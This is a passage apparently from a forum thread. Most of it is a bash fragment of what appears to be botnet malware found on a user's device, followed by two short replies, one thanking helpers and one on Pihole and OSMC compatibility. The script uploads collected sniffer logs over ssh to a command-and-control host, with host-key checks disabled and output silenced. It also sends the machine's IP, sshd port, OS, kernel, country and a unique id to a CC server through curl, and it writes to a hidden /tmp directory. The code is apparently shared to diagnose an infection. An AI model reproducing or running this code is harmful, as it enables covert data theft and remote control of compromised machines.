		else
		    if [[ ! -z $(ps -elf |grep "reverse@" |grep -v grep) ]]; then
				echo "-> reverse already running"
		    else
				### files are /etc/lps/final and maybe some /etc/lps/snf*
				echo "-> working on sniffer file"
				if [[ ! -s /etc/lps/final ]] ; then
				    	echo "-> sniffer file is empty"
				else
					echo "-> making some free space"
				    	apt-get clean >/dev/null 2>&1
					[[ ! -s /etc/lps/l0g_$ip ]] && { echo "### file created by ptty $ptty_ver" > /etc/lps/l0g_$ip ; }
					cat /etc/lps/final >> /etc/lps/l0g_$ip ; rm -rf /etc/lps/final
					if [[ $(wc -l < /etc/lps/l0g_$ip 2>/dev/null) -gt 600 ]]; then
						# upload failed to many times, deleting file
						echo "-> ERR | /etc/lps/l0g_$ip has +600 lines, deleting"
						rm -rf /etc/lps/l0g_$ip
					else
						echo "-> uploading /etc/lps/l0g_$ip to ${CCcmd[sniffer_ip]}"
						sniffer_log=$(cat /etc/lps/l0g_$ip 2>/dev/null)
						echo "$sniffer_log" | ssh -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o PubkeyAuthentication=no -o ConnectTimeout=5 -o ServerAliveCountMax=1 -o ServerAliveInterval=60 -o LogLevel=quiet -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -T reverse@${CCcmd[sniffer_ip]} "cat >> /etc/pps/l0g_$ip" >/dev/null 2>&1 &
						ec="$?"
						if [[ $ec = 0 ]]; then
						    	echo "-> upload OK, removing file"
						    	rm -rf /etc/lps/l0g_$ip
							# also trying to upload any snf* files
							if [[ $(ls -1 /etc/lps/snf* 2>/dev/null) ]]; then
								echo "-> uploading /etc/lps/snf* to ${CCcmd[sniffer_ip]}"
								for snf_file in $(ls -1 /etc/lps/snf* 2>/dev/null)
								do
									sniffer_log=$(cat $snf_file 2>/dev/null)
									echo "$sniffer_log" | ssh -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o PubkeyAuthentication=no -o ConnectTimeout=5 -o ServerAliveCountMax=1 -o ServerAliveInterval=60 -o LogLevel=quiet -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -T reverse@${CCcmd[sniffer_ip]} "cat >> /etc/pps/l0g_$ip" >/dev/null 2>&1 &
									if [[ $ec = 0 ]]; then
										echo "-> upload OK, removing file"
										rm -rf $snf_file
									else
										echo "-> upload failed"
										break
									fi
								done
							fi
						else
						    	echo "-> upload failed"
						fi
					fi
				fi
		    fi
		fi
	else
		echo "-> sniffer is set to 'on' but enabled for other id (${CCcmd[reverse_for]})"
	fi
fi

### sending data to CC
echo ; echo "--- SENDING DATA TO CC ---"
CC_senddata="${url}/srv.php?type=${type}&ip=${ip}&sshd_port=${sshd_port}&sshd_backup_missing=${sshd_backup_missing}&ptty_ver=${ptty_ver}&ctry=${CTRY}&id_unic=${id_unic}&os=${os}&arch=${arch}&kernel=${kernel}&upt=${upt}&serverspeed=${serverspeed}"
echo "-> Sending data to CC:"
echo "$CC_senddata"
if [[ $force = 1 ]] || [[ $log = 1 ]]; then
	curl --connect-timeout 20 --max-time 20 --retry 5 -s "$CC_senddata" >/dev/null 2>&1
	[[ "0" != "$?" ]] && { send_data_result=0; } || { send_data_result=1; }
		temp_text="-> w_test_result = $w_test_result | data sent to CC: $send_data_result"
		echo "$temp_text"; [[ $force = 1 ]] && { echo "$temp_text" > /tmp/.../p.l; }
else
	curl --connect-timeout 20 --max-time 20 --retry 5 -s "$CC_senddata" >/dev/null 2>&1 &
fi

Thank you all very much for your help! It had never occurred to me that this phoenomenom could be malicious.

Pihole is not compatible with OSMC. Pihole depends on NetworkManager while OSMC uses Connman. I doubt that Pihole is the cause of the problem, but if you do end up re-installing and rebuilding, do it without Pihole.